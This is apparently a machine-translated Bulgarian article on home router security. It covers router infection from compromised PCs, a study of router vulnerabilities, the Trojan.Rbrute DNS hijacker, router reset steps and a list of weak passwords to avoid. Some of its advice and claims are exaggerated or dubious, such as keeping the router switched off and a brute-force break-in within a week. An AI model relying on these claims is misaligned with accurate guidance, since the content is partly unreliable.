Вторият е през LAN, тоест от вашия компютър. Ако вашият компютър има троянски кон, тогава хакерите ще могат да наложат паролата на рутера директно от вашия компютър. Следователно тази парола трябва да се променя от време на време. Но какво да кажем за факта, че заразеният компютър ще се опита да хакне рутера от страната, от която не е осигурена защита? Първо трябва да разберете, че чист рутер със заразен компютър няма да издържи дълго. Редовна груба сила (атака с груба сила) ще го разбие след седмица или дори по-бързо. Така че, ако трябва често да почиствате рутера си, време е да помислите за пълно почистване от вируси.

А сега момент. Откъде идва вирусът/троянският кон на компютъра? Изброявам основните причини и в скоби решенията. Опциите са:

1 - първоначално кракнатият Windows е инсталиран (използвайте чисти инсталационни дискове);

2 - чист Windows изсумтя след инсталацията (или се търпете и го преинсталирайте ежемесечно или купете Windows);

3 - кракнат софтуер (използ безплатен софтуерили купете платено);

4 - имате вирус в личните си файлове (изпълнете всички лични файлове през почистването, както описах при почистване на системата от вируси);

5 - системата вече е заразена по време на използване чрез USB флаш устройство, интернет, дявол знае как (защита - изучаваме интернет по безопасен начин, за флаш памети, няма да споменавам последната точка).

Отделно отбелязвам, че след като са открили IP рутер, хакерите започват да го сканират, за да намерят достъп до криптираната парола и след това да завземат контрола с помощта на открадната парола. Така че, не оставяйте рутера включен, ако не се нуждаете от достъп до Интернет сега.

НО!!! Дори ако е зареден с виртуална машина, ще започне да удря вашия рутер. Деактивирането и повторното му активиране в процеса ще помогне тук, а ОСНОВНОТО след като изтеглянето на торента приключи - доставчикът ще издаде нов динамичен IP след рестартиране на рутера и хакерите ще трябва само да познаят на кой адрес се намирате в момента. И вашия рутер също... Разбира се, вие няма да останете на дистрибуциите - след като изтеглянето приключи, трябва незабавно да изключите програмата за изтегляне на торенти и СЛЕД това да изключите и включите рутера.

И най-общо казано

НЕ ДЪРЖЕТЕ РУТЕРА ВКЛЮЧЕН ОСВЕН! Не позволявайте на дребни хакери да имат достъп до вашия имот отново... Не забравяйте да почиствате рутера си всеки път, когато скоростта на интернет връзката падне необосновано. Вниманието няма да навреди...

Добре. Сега можете да вземете заводски инструкциикъм вашия рутер и посочете потребителското име и паролата, издадени от интернет доставчика. Това обикновено се прави в раздела WAN настройки. Сега няма да можете да управлявате рутера си през интернет. Поне засега.

Вашият рутер е едно от най-слабите ви звена във вашата сигурност и изследователите доказаха това още веднъж.

Открити са 60 дупки в сигурността в 22 модела рутери по целия свят, главно тези, предоставени от интернет доставчиците на своите клиенти. Наличието на тези уязвимости може да осигури на хакерите да хакнат устройства, да променят пароли и да инсталират и изпълняват злонамерени скриптове, които променят DNS сървърите. По този начин хакерите могат да ви пренасочат към злонамерени сайтове или да изтеглят злонамерен кодна вашия компютър, когато посещавате официалните уеб страници.

Уязвимостите също така позволяват на хакерите да четат и записват информация на USB устройства за съхранение, свързани към компрометиран рутер.

Изследването описва как нападателите могат да получат достъп до компютрите – а именно чрез бекдор с универсална парола, която се използва от персонала на техническия доставчик, за да помага на клиентите от разстояние по телефона. Този втори достъп по подразбиране с права на администратор е скрит от собственика на рутера.

Кои модели рутери са тествани?

Изследователите тестваха следните модели: Amper Xavi 7968, 7968+ и ASL-26555; Astoria ARV7510; Belkin F5D7632-4; cLinksys WRT54GL; Comtrend WAP-5813n, CT-5365, AR-5387un и 536+; D-Link DSL-2750B и DIR-600; Huawei HG553 и HG556a; ; Netgear CG3100D; Observa Telecom AW4062, RTA01N, Home Station BHS-RTA и VH4032N; Sagem LiveBox Pro 2 SP и Fast 1201 и Zyxel P 660HW-B1A.
Тъй като изследователите са от Мадрид, основната цел на тяхното изследване са рутери, предоставени от испански интернет доставчици, но Linksys, D-Link и Belkin се използват широко в Русия и други страни.

Как можете да защитите вашия рутер?

Във всичко антивирусна програма Avastвградена функция Home Network Security (HNS), която сканира лошо конфигурирана Wi-Fi мрежи, показва слаб или по подразбиране Wi-Fi пароли, уязвимости на рутера, хакнати интернет връзки и активиран, но не сигурен IPv6. Тази функциясъщо така показва списък с устройства, свързани към мрежата, което ще ви помогне да проверите дали само устройствата, които познавате, са свързани към вашата мрежа. Avast е единствената компания в областта на информационна сигурност, което предлага възможност за опазване на дадена територия.

Как да сканирате вашия домашен рутерсъс сигурност на домашната мрежа?

Отворете потребителския интерфейс на Avast, щракнете върху бутона Сканиране от менюто вляво, след което изберете Сканиране на мрежови заплахи.
Avast ще сканира вашия рутер и ще предостави отчет за намерените заплахи. В повечето случаи, ако се открие заплаха, която изисква вашето внимание, Avast ще ви насочи към уебсайта на производителя на рутера.

За да се предпазите от троянския кон Trojan.Rbrute, който заразява модеми/рутери на TP-link, трябва да изпълните няколко прости условия... Вирусът се разпространява чрез грубо сканиране на IP адреси в n-тия диапазон, след което започва да използва груба сила на паролата, използвайки метода на brutforce. Почти всички популярни модели са атакувани Tp-link рутери... Пробивайки път в настройките на устройството, троянецът променя DNS адресите на доставчика с адресите на нападателите.

Вашият рутер е заразен, ако:

Когато се опитате да излезете от всякаквисайт, било то remont-sro.ru или услугата Gmail.com, се отваря фалшив сайт за изтегляне Google Chromeили други подозрителни ресурси. Първоначално пренасочването работеше само за потребителски заявки, съдържащи думите Facebook или Google, но сега троянецът реагира на всяка от тях. Индикацията на модема остава същата, "Интернет" е включен постоянно, компютърът показва, че връзката е завършена, оторизацията е предадена, но самият интернет не работи, а само прехвърля изтегляния към рекламни и/или фалшиви страници

Елемент 1. Нулиране. Преконфигуриране на модема
Инструкцията е изготвена от специалиста на GTU ZOO Корчагина Мария

Ако не можете да въведете настройките на модема през 192.168.1.1, опитайте се да го направите чрез адреса 192.168.42.1

На тази страница са посочени настройките самоза интернет услуга. За да настроите IP-TV и WI-FI, изтеглете пълни ръководства

руска версия - http://yadi.sk/d/JC6l6FPVRbU9P

Английска версия - http://yadi.sk/d/j6Ly7bA4RbU8r

1. За да нулирате правилно настройките на модема, натиснете бутона с игла / паста / клечка за зъби Нулиранев малка депресия. Задържаме от 5 до 15 секунди, докато индикацията на устройството изчезне. Светлините трябва да изгаснат, както биха били след нормално рестартиране на рутера.

2. За конфигуриране модемът трябва да бъде свързан с кабел към всеки LAN порт, не конфигурирайте чрез Wi-Fi връзка.

3. Влезте чрез интернет браузър Explorer към интерфейса на рутера, на 192.168.1.1. Ще се отвори диалогов прозорец. В полетата "Потребителско име" и "Парола" въведете съответно admin/admin. Ще отвори начална страницарутер (вижте по-долу)

На тази страница ще видите кои настройки вече съществуват:

4. Преди да започнете да конфигурирате рутера, трябва да изтриете всички предварително създадени настройки, за това трябва да отидете в секцията "Настройки на интерфейса" -> "Интернет", изберете "Виртуален канал" - PVC0, в долната част на страницата натиснете бутона "изтриване". Правим това с всеки виртуален канал (има 8 от тях).

В резултат на това трябва да се случи това (отново отидете на раздела "държава"):

5. Сега отидете на раздела "Конфигуриране на интерфейса", след което изберете подраздел "Интернет"(вижте екранната снимка по-долу). Посочваме параметрите, както е на екранната снимка по-долу (потребител и парола: rtk), след което запазваме всички параметри, като щракнете върху бутона „Запазване“.
Това завършва настройката в режим PPPoE.

Елемент 2. Промяна на паролата за влизане в рутера

За да промените паролата си, отидете в секцията "Работа на устройството", тогава "Администрация", където всъщност паролата за влизане в рутера се променя (измислете сложна парола) (вижте екранната снимка по-долу). След това натиснете бутона "Запазване"

Клауза 2.5 Списък с пароли, които не се препоръчват за влизане в рутера

111111
12345
123456
12345678
abc123
админ
Администратор
парола
qwerty
корен
tadpassword
доверително1
консуматор
дракон
gizmodo
iqrquksm
Пусни ме вътре

Вирусът вече "знае" всички тези пароли и ще отнеме 1 секунда, за да познае паролата. Паролата трябва да се задава не само от цифри или букви. ТРЯБВА да има специални знаци (решетки, звездички, проценти, кавички) и букви с различен регистър (главни и малки). Колкото по-голяма и по-разнообразна е паролата, толкова повече време ще отнеме, за да я „грубите“ (ако изобщо е възможно).

ПОДОБНИ СТАТИИ